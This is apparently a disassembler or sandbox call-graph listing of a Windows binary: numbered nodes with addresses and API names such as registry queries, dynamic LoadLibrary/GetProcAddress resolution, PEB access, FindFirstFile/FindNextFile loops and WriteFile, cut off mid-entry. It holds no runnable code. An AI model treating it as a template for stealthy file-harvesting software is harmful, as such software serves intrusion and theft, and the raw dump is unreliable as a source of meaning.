19441 403d6c 4 API calls 19439->19441 19442 406623 19440->19442 19443 403bdc SysFreeString 19440->19443 19441->19442 19442->18455 19443->19442 19445 406653 19444->19445 19446 406657 19445->19446 19447 406669 19445->19447 19448 403d6c 4 API calls 19446->19448 19449 403bdc SysFreeString 19447->19449 19450 406667 19448->19450 19449->19450 19450->18457 19452 40628e 19451->19452 19503 406204 19452->19503 19456 4062b0 19457 4062cc 19456->19457 19458 4037dc 27 API calls 19456->19458 19459 4034e4 13 API calls 19457->19459 19458->19456 19460 4062e1 19459->19460 19460->18460 19462 403a7c 19461->19462 19464 403aa7 19461->19464 19516 403b1c 19462->19516 19464->18472 19466 406e86 19465->19466 19467 404150 SysAllocStringLen 19465->19467 19477 404150 19466->19477 19467->19466 19469 406e8e 19470 406ebf RegOpenKeyExW 19469->19470 19481 403d98 19470->19481 19474 406f04 19475 403bf4 SysFreeString 19474->19475 19476 406f1e 19475->19476 19476->18444 19478 404156 SysAllocStringLen 19477->19478 19480 40416c 19477->19480 19479 403bac 19478->19479 19478->19480 19479->19477 19480->19469 19482 403d9c RegQueryValueExW 19481->19482 19483 403d6c 19482->19483 19484 403cd0 19483->19484 19485 403cd8 SysAllocStringLen 19484->19485 19486 403bdc 19484->19486 19489 403ce8 SysFreeString 19485->19489 19490 403bac 19485->19490 19487 403bf0 19486->19487 19488 403be2 SysFreeString 19486->19488 19487->19474 19488->19487 19489->19474 19491 404156 SysAllocStringLen 19490->19491 19492 40416c 19490->19492 19491->19490 19491->19492 19492->19474 19494 403c20 19493->19494 19495 403bdc 19493->19495 19494->19495 19498 403c2b SysReAllocStringLen 19494->19498 19496 403bf0 19495->19496 19497 403be2 SysFreeString 19495->19497 19496->19432 19497->19496 19499 403c3b 19498->19499 19500 403bac 19498->19500 19499->19432 19501 404156 SysAllocStringLen 19500->19501 19502 40416c 19500->19502 19501->19500 19501->19502 19502->19432 19504 406215 19503->19504 19505 4034e4 13 API calls 19504->19505 19506 40626d 19505->19506 19507 40680c 19506->19507 19508 406811 19507->19508 19511 4035d4 19508->19511 19512 4035a8 27 API calls 19511->19512 19513 4035e4 19512->19513 19514 4034e4 13 API calls 19513->19514 19515 4035fc 19514->19515 19515->19456 19517 403b29 19516->19517 19521 403b59 19516->19521 19519 4035a8 27 API calls 19517->19519 19520 403b35 19517->19520 19518 4034e4 13 API calls 19518->19520 19519->19521 19520->19464 19521->19518 19523 40399c 19522->19523 19524 4039d7 19523->19524 19525 4035a8 27 API calls 19523->19525 19524->18491 19526 4039b3 19525->19526 19526->19524 19527 402550 13 API calls 19526->19527 19527->19524 19529 4035d4 27 API calls 19528->19529 19530 4036d9 19529->19530 19530->18513 19532 403a22 19531->19532 19533 4039f5 19531->19533 19534 4034e4 13 API calls 19532->19534 19533->19532 19536 403a09 19533->19536 19535 403a18 19534->19535 19535->18579 19537 4035d4 27 API calls 19536->19537 19537->19535 19539 4176a7 19538->19539 19540 4034e4 13 API calls 19539->19540 19541 4176bd 19540->19541 19616 404804 19541->19616 19543 4176d8 19544 4177a4 19543->19544 19619 41759c 19543->19619 19545 4177a8 19544->19545 19546 4177cd 19544->19546 19547 4037dc 27 API calls 19545->19547 19629 4174e8 19546->19629 19550 4177bc 19547->19550 19552 417da4 65 API calls 19550->19552 19551 4177cb 19553 4034e4 13 API calls 19551->19553 19552->19551 19554 4177ec 19553->19554 19642 404810 19554->19642 19557 4034e4 13 API calls 19558 417802 19557->19558 19558->18591 19560 417888 19559->19560 19561 40357c 13 API calls 19560->19561 19562 4178c3 19561->19562 19563 4039e8 27 API calls 19562->19563 19564 4178cb GetModuleHandleA 19563->19564 19565 4178e7 19564->19565 19566 4178d7 19564->19566 19567 4039e8 27 API calls 19565->19567 19568 4039e8 27 API calls 19566->19568 19570 4178ef GetProcAddress 19567->19570 19569 4178df LoadLibraryA 19568->19569 19569->19565 19571 4039e8 27 API calls 19570->19571 19572 417906 GetProcAddress 19571->19572 19573 4039e8 27 API calls 19572->19573 19574 41791d GetProcAddress 19573->19574 19575 4039e8 27 API calls 19574->19575 19576 417934 GetProcAddress 19575->19576 19577 4039e8 27 API calls 19576->19577 19578 41794b GetProcAddress 19577->19578 19579 4039e8 27 API calls 19578->19579 19580 417962 GetProcAddress 19579->19580 19581 4039e8 27 API calls 19580->19581 19582 417979 GetProcAddress 19581->19582 19583 4039e8 27 API calls 19582->19583 19584 417990 GetProcAddress 19583->19584 19585 417bfe 19584->19585 19593 4179a7 19584->19593 19586 403bf4 SysFreeString 19585->19586 19587 417c1b 19586->19587 19588 4034e4 13 API calls 19587->19588 19589 417c26 19588->19589 19590 403bf4 SysFreeString 19589->19590 19591 417c36 19590->19591 19592 403508 13 API calls 19591->19592 19594 417c43 19592->19594 19593->19585 19595 4034e4 13 API calls 19593->19595 19596 403508 13 API calls 19594->19596 19598 417a17 19595->19598 19597 417c50 19596->19597 19597->18588 19598->19585 19599 403850 27 API calls 19598->19599 19600 417aea 19599->19600 19601 41747c 4 API calls 19600->19601 19602 417b14 19601->19602 19603 403e78 3 API calls 19602->19603 19604 417b43 19603->19604 19605 4039e8 27 API calls 19604->19605 19606 417b64 19605->19606 19607 4034e4 13 API calls 19606->19607 19610 417b74 19607->19610 19608 4034e4 13 API calls 19608->19610 19609 4035d4 27 API calls 19609->19610 19610->19608 19610->19609 19611 403798 27 API calls 19610->19611 19612 417bc4 19610->19612 19611->19610 19613 4039f0 27 API calls 19612->19613 19614 417bf3 19613->19614 19615 403538 27 API calls 19614->19615 19615->19585 19648 404678 19616->19648 19620 4175b3 LoadLibraryA GetProcAddress 19619->19620 19705 403980 19619->19705 19622 4175de 19620->19622 19628 4175f9 19620->19628 19623 402530 27 API calls 19622->19623 19625 4175ed 19623->19625 19624 4034e4 13 API calls 19626 41763d 19624->19626 19627 402530 27 API calls 19625->19627 19626->19543 19627->19628 19628->19624 19707 41747c 19629->19707 19632 41747c 4 API calls 19633 417529 19632->19633 19634 41747c 4 API calls 19633->19634 19635 41753e 19634->19635 19636 41747c 4 API calls 19635->19636 19637 417553 19636->19637 19713 403e78 19637->19713 19643 404848 19642->19643 19646 404816 19642->19646 19643->19557 19644 404840 19645 402550 13 API calls 19644->19645 19645->19643 19646->19643 19646->19644 19647 404280 15 API calls 19646->19647 19647->19644 19649 404697 19648->19649 19653 4046b1 19648->19653 19650 4046a2 19649->19650 19651 402614 13 API calls 19649->19651 19662 404670 19650->19662 19651->19650 19655 4046fb 19653->19655 19656 402614 13 API calls 19653->19656 19654 4046ac 19654->19543 19657 402530 27 API calls 19655->19657 19659 404708 19655->19659 19656->19655 19658 404747 19657->19658 19658->19659 19665 404658 19658->19665 19659->19654 19661 404678 32 API calls 19659->19661 19661->19659 19663 404810 15 API calls 19662->19663 19664 404675 19663->19664 19664->19654 19668 4044a0 19665->19668 19667 404663 19667->19659 19669 4044b5 19668->19669 19683 4044db 19668->19683 19671 4044ba 19669->19671 19672 4044fd 19669->19672 19670 403538 27 API calls 19670->19683 19674 404511 19671->19674 19675 4044bf 19671->19675 19673 403c18 3 API calls 19672->19673 19685 4044f8 19672->19685 19673->19672 19674->19685 19687 40436c 19674->19687 19677 4044c4 19675->19677 19684 404525 19675->19684 19678 404546 19677->19678 19679 4044c9 19677->19679 19678->19685 19692 404384 19678->19692 19682 404577 19679->19682 19679->19683 19679->19685 19681 4044a0 32 API calls 19681->19684 19682->19685 19701 40484c 19682->19701 19683->19670 19683->19685 19684->19681 19684->19685 19685->19667 19688 40437c 19687->19688 19690 404375 19687->19690 19689 402614 13 API calls 19688->19689 19691 404383 19689->19691 19690->19674 19691->19674 19698 40439e 19692->19698 19693 403538 27 API calls 19693->19698 19694 403c18 3 API calls 19694->19698 19695 40436c 13 API calls 19695->19698 19696 40448a 19696->19678 19697 4044a0 32 API calls 19697->19698 19698->19693 19698->19694 19698->19695 19698->19696 19698->19697 19699 404384 32 API calls 19698->19699 19700 40484c 15 API calls 19698->19700 19699->19698 19700->19698 19703 404853 19701->19703 19702 40486d 19702->19682 19703->19702 19704 404810 15 API calls 19703->19704 19704->19702 19706 403984 19705->19706 19706->19620 19708 4174ab 19707->19708 19709 403c18 3 API calls 19708->19709 19710 4174c3 19709->19710 19711 403bdc SysFreeString 19710->19711 19712 4174d8 19711->19712 19712->19632 19714 403e80 19713->19714 19719 403bb4 19714->19719 19716 403e95 19725 403bcc 19716->19725 19720 403bc8 19719->19720 19721 403bb8 SysAllocStringLen 19719->19721 19720->19716 19721->19720 19722 403bac 19721->19722 19723 404156 SysAllocStringLen 19722->19723 19724 40416c 19722->19724 19723->19722 19723->19724 19724->19716 19726 403bd2 SysFreeString 19725->19726 19727 403bd8 19725->19727 19726->19727 19768 40410c 19728->19768 19730 40630e 19731 40410c 3 API calls 19730->19731 19732 406339 19731->19732 19732->18770 19734 404150 SysAllocStringLen 19733->19734 19735 4094fc 19734->19735 19736 407a18 32 API calls 19735->19736 19746 409522 19736->19746 19737 4095e3 19738 403bf4 SysFreeString 19737->19738 19739 4095fd 19738->19739 19740 403508 13 API calls 19739->19740 19741 40960a 19740->19741 19742 404810 15 API calls 19741->19742 19743 409618 19742->19743 19744 4034e4 13 API calls 19743->19744 19745 409620 19744->19745 19747 403bdc SysFreeString 19745->19747 19746->19737 19749 4039f0 27 API calls 19746->19749 19751 4095ad 19746->19751 19748 409628 19747->19748 19753 403e14 19748->19753 19749->19746 19750 403e78 3 API calls 19750->19751 19751->19750 19774 407360 19751->19774 19754 403e2b 19753->19754 19755 403e71 19754->19755 19756 403bb4 2 API calls 19754->19756 19759 40776c 19755->19759 19757 403e48 19756->19757 19758 403bcc SysFreeString 19757->19758 19758->19755 19760 404150 SysAllocStringLen 19759->19760 19761 40777c 19760->19761 19762 407792 GetFileAttributesW 19761->19762 19763 4077af 19762->19763 19764 403bdc SysFreeString 19763->19764 19765 4077b7 19764->19765 19765->18779 19765->18783 19767 403994 GetProcAddress 19766->19767 19767->18800 19769 404119 19768->19769 19773 404120 19768->19773 19771 403bb4 2 API calls 19769->19771 19770 403bcc SysFreeString 19772 404149 19770->19772 19771->19773 19772->19730 19773->19770 19775 404150 SysAllocStringLen 19774->19775 19776 407375 19775->19776 19777 4039e8 27 API calls 19776->19777 19778 4073c5 WriteFile 19777->19778 19779 4073d6 19778->19779 19780 4034e4 13 API calls 19779->19780 19781 4073eb 19780->19781 19782 403bdc SysFreeString 19781->19782 19783 4073f3 19782->19783 19783->19746 19785 4166cb 19784->19785 19785->18830 19787 403538 27 API calls 19786->19787 19788 407b31 19787->19788 19789 407b40 19788->19789 19790 407b4f 19788->19790 19791 40357c 13 API calls 19789->19791 19792 40357c 13 API calls 19790->19792 19793 407b4d 19791->19793 19792->19793 19990 407af0 GetPEB 19793->19990 19795 407b61 19796 40709c 4 API calls 19795->19796 19797 407b89 19796->19797 19798 40709c 4 API calls 19797->19798 19799 407b9b 19798->19799 19800 403e78 3 API calls 19799->19800 19802 407bab 19800->19802 19801 407bc7 19804 403bf4 SysFreeString 19801->19804 19802->19801 19803 403798 27 API calls 19802->19803 19803->19801 19805 407be1 19804->19805 19806 4034e4 13 API calls 19805->19806 19807 407be9 19806->19807 19807->18835 19809 403c18 3 API calls 19808->19809 19810 4066f3 19809->19810 19991 406678 GetModuleHandleA GetProcAddress 19810->19991 19813 406708 19813->18839 19814 403c18 3 API calls 19814->19813 19990->19795 19992 40669a GetCurrentProcess 19991->19992 19993 4066a3 19991->19993 19992->19993 19993->19813 19993->19814 20070 40a39c 20069->20070 20070->20070 20071 40a51b 20070->20071 20072 4062fc 3 API calls 20070->20072 20074 4034e4 13 API calls 20071->20074 20073 40a3d7 20072->20073 20378 409ef0 20073->20378 20075 40a530 20074->20075 20076 403bdc SysFreeString 20075->20076 20077 40a538 20076->20077 20079 403508 13 API calls 20077->20079 20082 40a545 20079->20082 20081 4062fc 3 API calls 20083 40a411 20081->20083 20084 403bdc SysFreeString 20082->20084 20087 409ef0 40 API calls 20083->20087 20085 40a54d 20084->20085 20086 403508 13 API calls 20085->20086 20088 40a55a 20086->20088 20089 40a433 20087->20089 20090 403bdc SysFreeString 20088->20090 20091 4062fc 3 API calls 20089->20091 20092 40a562 20090->20092 20093 40a44b 20091->20093 20094 403508 13 API calls 20092->20094 20097 409ef0 40 API calls 20093->20097 20095 40a56f 20094->20095 20096 403bdc SysFreeString 20095->20096 20098 40a577 20096->20098 20099 40a46d 20097->20099 20100 403508 13 API calls 20098->20100 20102 4062fc 3 API calls 20099->20102 20101 40a584 20100->20101 20103 403bdc SysFreeString 20101->20103 20104 40a485 20102->20104 20105 40a58c 20103->20105 20107 409ef0 40 API calls 20104->20107 20106 403508 13 API calls 20105->20106 20108 40a599 20106->20108 20109 40a4a7 20107->20109 20110 403bdc SysFreeString 20108->20110 20111 4062fc 3 API calls 20109->20111 20112 40a5a1 20110->20112 20113 40a4bf 20111->20113 20114 4034e4 13 API calls 20112->20114 20116 409ef0 40 API calls 20113->20116 20115 40a5a9 20114->20115 20121 40ac08 20115->20121 20117 40a4e1 20116->20117 20118 4062fc 3 API calls 20117->20118 20119 40a4f9 20118->20119 20120 409ef0 40 API calls 20119->20120 20120->20071 20122 40ac10 20121->20122 20122->20122 20123 40b103 20122->20123 20124 4062fc 3 API calls 20122->20124 20125 403bf4 SysFreeString 20123->20125 20126 40ac42 20124->20126 20127 40b120 20125->20127 20486 40a9e4 20126->20486 20253 40c104 20127->20253 20130 4062fc 3 API calls 20131 40ac64 20130->20131 20132 40a9e4 45 API calls 20131->20132 20133 40ac77 20132->20133 20134 4062fc 3 API calls 20133->20134 20135 40ac86 20134->20135 20136 40a9e4 45 API calls 20135->20136 20137 40ac99 20136->20137 20254 40c11d 20253->20254 20594 40bebc 20253->20594 20256 40bc24 20254->20256 20257 40357c 13 API calls 20256->20257 20258 40bc5b 20257->20258 20616 40bb90 20258->20616 20265 40bc66 20379 409ef9 20378->20379 20379->20379 20380 404150 SysAllocStringLen 20379->20380 20381 409f15 20380->20381 20382 404804 32 API calls 20381->20382 20383 409f48 20382->20383 20384 403e14 3 API calls 20383->20384 20386 409f69 20384->20386 20385 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20385->20386 20386->20385 20387 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 20386->20387 20389 40a290 20386->20389 20406 4069a8 27 API calls 20386->20406 20407 4039e8 27 API calls 20386->20407 20408 4034e4 13 API calls 20386->20408 20409 4036cc 27 API calls 20386->20409 20410 403798 27 API calls 20386->20410 20412 409c28 20386->20412 20438 40525c 20386->20438 20387->20386 20390 403508 13 API calls 20389->20390 20391 40a31f 20390->20391 20392 403bf4 SysFreeString 20391->20392 20393 40a32f 20392->20393 20394 4034e4 13 API calls 20393->20394 20395 40a337 20394->20395 20396 404810 15 API calls 20395->20396 20397 40a345 20396->20397 20398 403508 13 API calls 20397->20398 20399 40a352 20398->20399 20400 4034e4 13 API calls 20399->20400 20401 40a35a 20400->20401 20402 403bdc SysFreeString 20401->20402 20403 40a362 20402->20403 20404 4034e4 13 API calls 20403->20404 20405 40a36a 20404->20405 20405->20081 20406->20386 20407->20386 20408->20386 20409->20386 20410->20386 20413 409c30 20412->20413 20413->20413 20414 404150 SysAllocStringLen 20413->20414 20415 409c47 20414->20415 20416 404804 32 API calls 20415->20416 20417 409c75 20416->20417 20460 407228 20417->20460 20419 409c83 20420 409ca5 20419->20420 20421 403850 27 API calls 20419->20421 20422 4074e8 27 API calls 20420->20422 20421->20420 20423 409cb5 20422->20423 20424 40357c 13 API calls 20423->20424 20435 409cc0 20424->20435 20425 409e65 20426 403508 13 API calls 20425->20426 20428 409e7f 20426->20428 20427 403850 27 API calls 20427->20435 20429 403bdc SysFreeString 20428->20429 20430 409e87 20429->20430 20430->20386 20431 4039f0 27 API calls 20431->20435 20432 4074e8 27 API calls 20432->20435 20433 4037dc 27 API calls 20433->20435 20435->20425 20435->20427 20435->20431 20435->20432 20435->20433 20436 404804 32 API calls 20435->20436 20437 403538 27 API calls 20435->20437 20475 403a30 20435->20475 20436->20435 20437->20435 20439 405276 20438->20439 20440 404804 32 API calls 20439->20440 20448 4053eb 20439->20448 20441 40534a 20440->20441 20442 403538 27 API calls 20441->20442 20443 405365 20442->20443 20444 403538 27 API calls 20443->20444 20445 40537d 20444->20445 20446 403538 27 API calls 20445->20446 20447 405395 20446->20447 20449 403538 27 API calls 20447->20449 20451 403508 13 API calls 20448->20451 20450 4053ad 20449->20450 20453 403538 27 API calls 20450->20453 20452 405405 20451->20452 20454 403508 13 API calls 20452->20454 20455 4053c5 20453->20455 20456 405412 20454->20456 20457 403538 27 API calls 20455->20457 20456->20386 20458 4053dd 20457->20458 20459 405114 27 API calls 20458->20459 20459->20448 20461 404150 SysAllocStringLen 20460->20461 20462 407242 20461->20462 20463 4034e4 13 API calls 20462->20463 20464 407258 20463->20464 20465 4034e4 13 API calls 20464->20465 20467 407260 20465->20467 20466 4072c0 20468 403b1c 27 API calls 20466->20468 20467->20466 20469 407335 20467->20469 20470 4072df 20468->20470 20471 4034e4 13 API calls 20469->20471 20470->20419 20472 40734a 20471->20472 20473 403bdc SysFreeString 20472->20473 20474 407352 20473->20474 20474->20419 20480 4039e0 20475->20480 20477 403a74 20477->20435 20478 403a3e 20478->20477 20479 403b1c 27 API calls 20478->20479 20479->20477 20482 40399c 20480->20482 20481 4039d7 20481->20478 20482->20481 20483 4035a8 27 API calls 20482->20483 20484 4039b3 20483->20484 20484->20481 20485 402550 13 API calls 20484->20485 20485->20481 20487 40aa2d 20486->20487 20488 404150 SysAllocStringLen 20486->20488 20489 404150 SysAllocStringLen 20487->20489 20488->20487 20490 40aa35 20489->20490 20491 403bdc SysFreeString 20490->20491 20492 40aa4b 20491->20492 20493 403e14 3 API calls 20492->20493 20495 40aa65 20493->20495 20494 40776c 3 API calls 20494->20495 20495->20494 20496 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20495->20496 20497 40ab9e 20495->20497 20498 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 20495->20498 20504 40a6f0 20495->20504 20496->20495 20500 403bf4 SysFreeString 20497->20500 20498->20495 20501 40abc8 20500->20501 20502 403bf4 SysFreeString 20501->20502 20503 40abd5 20502->20503 20503->20130 20505 40a6f9 20504->20505 20505->20505 20506 404150 SysAllocStringLen 20505->20506 20507 40a716 20506->20507 20508 404150 SysAllocStringLen 20507->20508 20509 40a71e 20508->20509 20510 404150 SysAllocStringLen 20509->20510 20511 40a726 20510->20511 20512 4034e4 13 API calls 20511->20512 20513 40a73c 20512->20513 20514 40709c 4 API calls 20513->20514 20515 40a74d 20514->20515 20549 406fdc 20515->20549 20577 4027b4 QueryPerformanceCounter 20549->20577 20595 40bef6 20594->20595 20596 40bf03 LoadLibraryA GetProcAddress 20595->20596 20597 40bf25 20596->20597 20598 40bf5b LoadLibraryA 20597->20598 20599 40c0a3 20598->20599 20600 40bf6b 20598->20600 20601 403bf4 SysFreeString 20599->20601 20602 40bf77 GetProcAddress 20600->20602 20603 40c0bd 20601->20603 20604 403990 20602->20604 20605 403508 13 API calls 20603->20605 20606 40bf8c GetProcAddress 20604->20606 20608 40c0ca 20605->20608 20607 403990 20606->20607 20609 40bfa1 GetProcAddress 20607->20609 20610 404280 15 API calls 20608->20610 20612 40bfbc 20609->20612 20611 40c0dd 20610->20611 20611->20254 20612->20599 20613 404810 15 API calls 20612->20613 20614 40370c 28 API calls 20612->20614 20615 40525c 32 API calls 20612->20615 20613->20612 20614->20612 20615->20612 20617 40bba2 20616->20617 20618 4034e4 13 API calls 20617->20618 20619 40bbb7 20618->20619 20626 40baf0 20619->20626 20622 40bbca 20624 4034e4 13 API calls 20622->20624 20625 40bbdf 20624->20625 20625->20265 20627 4075c0 8 API calls 20626->20627 20628 40bb25 20627->20628 20629 403bdc SysFreeString 20628->20629 20630 40bb64 20629->20630 20631 4034e4 13 API calls 20630->20631 20632 40bb6c 20631->20632 20632->20622 20633 40ba38 20632->20633 20634 40ba51 20633->20634 20635 4034e4 13 API calls 20634->20635 20636 40ba66 20635->20636 20972 41030c 20971->20972 20973 4062fc 3 API calls 20972->20973 20974 41033e 20973->20974 21307 41006c 20974->21307 20977 4062fc 3 API calls 20978 41036d 20977->20978 20979 41006c 41 API calls 20978->20979 20980 41038d 20979->20980 20981 4062fc 3 API calls 20980->20981 20982 41039c 20981->20982 20983 41006c 41 API calls 20982->20983 20984 4103bc 20983->20984 20985 4062fc 3 API calls 20984->20985 20986 4103cb 20985->20986 20987 41006c 41 API calls 20986->20987 20988 4103eb 20987->20988 20989 4062fc 3 API calls 20988->20989 20990 4103fa 20989->20990 20991 41006c 41 API calls 20990->20991 20992 41041a 20991->20992 20993 4062fc 3 API calls 20992->20993 20994 410429 20993->20994 21308 410075 21307->21308 21308->21308 21309 404150 SysAllocStringLen 21308->21309 21310 410094 21309->21310 21311 404150 SysAllocStringLen 21310->21311 21312 41009c 21311->21312 21313 404150 SysAllocStringLen 21312->21313 21314 4100a4 21313->21314 21315 403e14 3 API calls 21314->21315 21319 4100d2 21315->21319 21316 403d6c 4 API calls 21316->21319 21317 403e78 3 API calls 21317->21319 21319->21316 21319->21317 21320 403798 27 API calls 21319->21320 21321 410143 21319->21321 21415 40fe00 21319->21415 21320->21319 21322 403e78 3 API calls 21321->21322 21326 41016b 21322->21326 21323 403d6c 4 API calls 21323->21326 21324 403e78 3 API calls 21324->21326 21325 40fe00 33 API calls 21325->21326 21326->21323 21326->21324 21326->21325 21327 403798 27 API calls 21326->21327 21328 4101dc 21326->21328 21327->21326 21329 410230 21328->21329 21330 403e78 3 API calls 21328->21330 21332 403bdc SysFreeString 21329->21332 21331 410211 21330->21331 21440 40e6d4 21331->21440 21333 410248 21332->21333 21334 4034e4 13 API calls 21333->21334 21335 410253 21334->21335 21337 403bf4 SysFreeString 21335->21337 21338 410263 21337->21338 21339 4034e4 13 API calls 21338->21339 21340 41026e 21339->21340 21341 403bf4 SysFreeString 21340->21341 21342 41027e 21341->21342 21343 4034e4 13 API calls 21342->21343 21344 410289 21343->21344 21345 403bdc SysFreeString 21344->21345 21346 410294 21345->21346 21347 4034e4 13 API calls 21346->21347 21348 41029c 21347->21348 21349 403bf4 SysFreeString 21348->21349 21350 4102a9 21349->21350 21350->20977 21416 40fe08 21415->21416 21416->21416 21417 404150 SysAllocStringLen 21416->21417 21418 40fe20 21417->21418 21419 4034e4 13 API calls 21418->21419 21420 40fe36 21419->21420 21421 407228 29 API calls 21420->21421 21422 40fe41 21421->21422 21423 407a18 32 API calls 21422->21423 21437 40fe51 21423->21437 21424 40ffbd 21425 403538 27 API calls 21424->21425 21426 40ffc8 21425->21426 21427 404810 15 API calls 21426->21427 21428 40ffd6 21427->21428 21429 403508 13 API calls 21428->21429 21430 40fff0 21429->21430 21431 404810 15 API calls 21430->21431 21432 40fffe 21431->21432 21433 403bdc SysFreeString 21432->21433 21434 410006 21433->21434 21434->21319 21435 40357c 13 API calls 21435->21437 21436 4039f0 27 API calls 21436->21437 21437->21424 21437->21435 21437->21436 21438 403850 27 API calls 21437->21438 21448 405194 21437->21448 21438->21437 21441 40e6ed 21440->21441 21442 40e734 21441->21442 21458 40e694 21441->21458 21443 403508 13 API calls 21442->21443 21444 40e78e 21443->21444 21444->21329 21449 4051a6 21448->21449 21450 405239 21449->21450 21453 404804 32 API calls 21449->21453 21451 4034e4 13 API calls 21450->21451 21452 40524e 21451->21452 21452->21437 21454 405212 21453->21454 21455 403538 27 API calls 21454->21455 21456 405231 21455->21456 21457 405114 27 API calls 21456->21457 21457->21450 21459 4034e4 13 API calls 21458->21459 21460 40e6a2 21459->21460 21461 40e6ce 21460->21461 21462 403b1c 27 API calls 21460->21462 21465 40e398 21461->21465 21463 40e6b8 21462->21463 21464 40e6c8 CharToOemBuffA 21463->21464 21464->21461 21466 40e3bc 21465->21466 21467 40357c 13 API calls 21466->21467 21468 40e3dd 21467->21468 21469 40357c 13 API calls 21468->21469 21470 40e3e8 21469->21470 21471 403b1c 27 API calls 21470->21471 21472 40e407 21471->21472 21473 403b1c 27 API calls 21472->21473 21474 40e411 21473->21474 21475 4039e8 27 API calls 21474->21475 21476 40e419 21475->21476 21477 4035d4 27 API calls 21476->21477 21478 40e4d9 21477->21478 21479 403850 27 API calls 21478->21479 21480 40e4f2 21479->21480 21481 4034e4 13 API calls 21480->21481 21482 40e4fa 21481->21482 21483 4035d4 27 API calls 21482->21483 21484 40e50a 21483->21484 21485 403850 27 API calls 21484->21485 21486 40e520 21485->21486 21487 4034e4 13 API calls 21486->21487 21488 40e528 21487->21488 21489 403508 13 API calls 21488->21489 21490 40e545 21489->21490 21490->21442 21858 413300 21857->21858 21859 413b47 21858->21859 21860 4062fc 3 API calls 21858->21860 21861 403bf4 SysFreeString 21859->21861 21862 413341 21860->21862 21863 413b64 21861->21863 22011 412d6c 21862->22011 21864 4034e4 13 API calls 21863->21864 21865 413b6c 21864->21865 21865->18287 21868 4062fc 3 API calls 21869 413372 21868->21869 21870 412d6c 50 API calls 21869->21870 21871 413392 21870->21871 21872 4062fc 3 API calls 21871->21872 21873 4133a3 21872->21873 21874 412d6c 50 API calls 21873->21874 21875 4133c3 21874->21875 21876 4062fc 3 API calls 21875->21876 21877 4133d4 21876->21877 21878 412d6c 50 API calls 21877->21878 21879 4133f4 21878->21879 21880 4062fc 3 API calls 21879->21880 21881 413405 21880->21881 21882 412d6c 50 API calls 21881->21882 21883 413425 21882->21883 21884 4062fc 3 API calls 21883->21884 21885 413436 21884->21885 21886 412d6c 50 API calls 21885->21886 21887 413456 21886->21887 21888 4062fc 3 API calls 21887->21888 21889 413467 21888->21889 21890 412d6c 50 API calls 21889->21890 21891 413487 21890->21891 21892 4062fc 3 API calls 21891->21892 22012 404150 SysAllocStringLen 22011->22012 22013 412dc7 22012->22013 22014 404150 SysAllocStringLen 22013->22014 22015 412dcf 22014->22015 22016 404150 SysAllocStringLen 22015->22016 22017 412dd7 22016->22017 22018 403e14 3 API calls 22017->22018 22019 412dff 22018->22019 22020 412e0a FindFirstFileW 22019->22020 22039 412e13 22020->22039 22021 40776c 3 API calls 22021->22039 22022 412f52 FindNextFileW 22023 412f6a FindClose 22022->22023 22022->22039 22024 412f80 22023->22024 22025 403bf4 SysFreeString 22024->22025 22026 412f90 22025->22026 22027 4034e4 13 API calls 22026->22027 22028 412f9b 22027->22028 22030 403bf4 SysFreeString 22028->22030 22031 412fab 22030->22031 22032 4034e4 13 API calls 22031->22032 22034 412fb6 22032->22034 22033 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 22033->22039 22035 403bf4 SysFreeString 22034->22035 22037 412fc6 22035->22037 22036 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 22036->22039 22038 403bf4 SysFreeString 22037->22038 22040 412fd3 22038->22040 22039->22021 22039->22022 22039->22033 22039->22036 22041 40e6d4 28 API calls 22039->22041 22073 412974 22039->22073 22040->21868 22041->22039 22074 41297c 22073->22074 22074->22074 22075 404150 SysAllocStringLen 22074->22075 22076 412994 22075->22076 22077 403bdc SysFreeString 22076->22077 22078 4129aa GetTickCount 22077->22078 22079 40709c 4 API calls 22078->22079 22080 4129c5 22079->22080 22081 406fdc 10 API calls 22080->22081 22082 4129d0 22081->22082 22083 403e78 3 API calls 22082->22083 22084 4129e5 22083->22084 22085 4078d8 8 API calls 22084->22085 22086 4129f0 22085->22086 22087 4062fc 3 API calls 22086->22087 22088 4129fd 22087->22088 22089 403e78 3 API calls 22088->22089 22090 412a15 22089->22090 22091 4078d8 8 API calls 22090->22091 22092 412a20 22091->22092 22093 412a33 6BD67450 22092->22093 22094 412a44 22093->22094 22095 404b58 28 API calls 22094->22095 22096 412a4f 22095->22096 22097 40776c 3 API calls 22096->22097 22120 412a62 22097->22120 22098 412a66 22099 403bf4 SysFreeString 22098->22099 22100 412bf4 22099->22100 22101 4034e4 13 API calls 22100->22101 22102 412bfc 22101->22102 22103 403bf4 SysFreeString 22102->22103 22104 412c09 22103->22104 22105 403508 13 API calls 22104->22105 22106 412c16 22105->22106 22108 403bf4 SysFreeString 22106->22108 22107 412b91 22109 403c18 3 API calls 22107->22109 22110 412c23 22108->22110 22111 412bcc 22109->22111 22113 4034e4 13 API calls 22110->22113 22115 412bd4 6BD677D0 22111->22115 22112 4034e4 13 API calls 22112->22120 22114 412c2b 22113->22114 22116 403bf4 SysFreeString 22114->22116 22115->22098 22120->22098 22120->22107 22120->22112 22121 403e78 3 API calls 22120->22121 22121->22120 22172 404150 SysAllocStringLen 22171->22172 22173 4077db 22172->22173 22174 403bdc SysFreeString 22173->22174 22175 4077f0 22174->22175 22176 407829 22175->22176 22179 403f44 4 API calls 22175->22179 22177 403bdc SysFreeString 22176->22177 22178 407845 22177->22178 22178->18975 22179->22176 22181 404150 SysAllocStringLen 22180->22181 22182 40e7b5 22181->22182 22183 40e86b 22182->22183 22184 407228 29 API calls 22182->22184 22185 403bf4 SysFreeString 22183->22185 22189 40e7f7 22184->22189 22186 40e885 22185->22186 22187 403508 13 API calls 22186->22187 22188 40e892 22187->22188 22192 403bdc SysFreeString 22188->22192 22190 40e845 22189->22190 22193 4062fc 3 API calls 22189->22193 22191 40e6d4 28 API calls 22190->22191 22194 40e850 22191->22194 22195 40e89a 22192->22195 22198 40e812 22193->22198 22196 4062fc 3 API calls 22194->22196 22195->18988 22197 40e85d 22196->22197 22199 40e865 6BD677D0 22197->22199 22200 40e823 6BD67450 22198->22200 22199->22183 22200->22190 22201 40e82d 22200->22201 22202 4062fc 3 API calls 22201->22202 22203 40e83a 22202->22203 22204 407228 29 API calls 22203->22204 22204->22190 22206 40509c 22205->22206 22207 403538 27 API calls 22206->22207 22212 4050b4 22207->22212 22208 4050f1 22209 